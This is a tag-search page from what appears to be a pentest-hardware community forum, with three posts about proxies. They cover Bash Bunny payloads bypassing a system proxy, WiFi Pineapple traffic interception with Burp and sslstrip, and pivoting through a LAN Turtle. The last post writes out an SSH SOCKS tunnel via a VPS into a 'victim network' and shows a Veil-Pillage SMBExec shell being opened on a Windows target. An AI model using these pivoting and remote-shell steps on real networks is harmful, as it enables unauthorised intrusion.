Search the Community
Showing results for tags 'proxy'.
Found 4 results
Hi there, I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default. I am currently unaware of a good solution to circumvent a system wide proxy in powershell, especially without local admin. Any ideas? Best regards! F
Hi Everyone! I am trying to achieve this scenario : connect client to management AP, gets IP address from pineapple. PC on same pine network has same subnet address of 172.16.42.0/24. I want to be able to forward all traffic from the client device onto the PC which is running burpsuite. I have tried almost every thread that i can find and whatever i do i cannot get this traffic from the device through burpsuite. is it actually possible to do this? as in a client connects to the pineapple network and then the traffic is passed through to burpsuite? My set up in burpsuite was to look at all interfaces on port 8080. Then i tried the specific address of the burp PC with 8080 but still no traffic coming through. The only was i have got it to work slightly is by configuring the client device to use a proxy which directs straight to the PC using burp. This then causes problems about SSL connections failing (which i expected, but was worth a long shot) i then started to run ssl strip on pineapple to try and see if that would help, but no, the webpages would not load due to the SSL connections failed. When i do proxy straight through to the PC running burp the websites again, do not load and i am stuck with a loading screen for whatever im using. Obviously this isn't ideal and im hoping to use this in a presentation coming up very soon. I have been ripping my hair out over this for about a week now... surely it not this hard!! ANy help would be appreciated, mainly getting traffic flowing from pineapple to burp! THANKS!!!! w
Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was 10.13.37.27, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-10.13.37.27:445-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"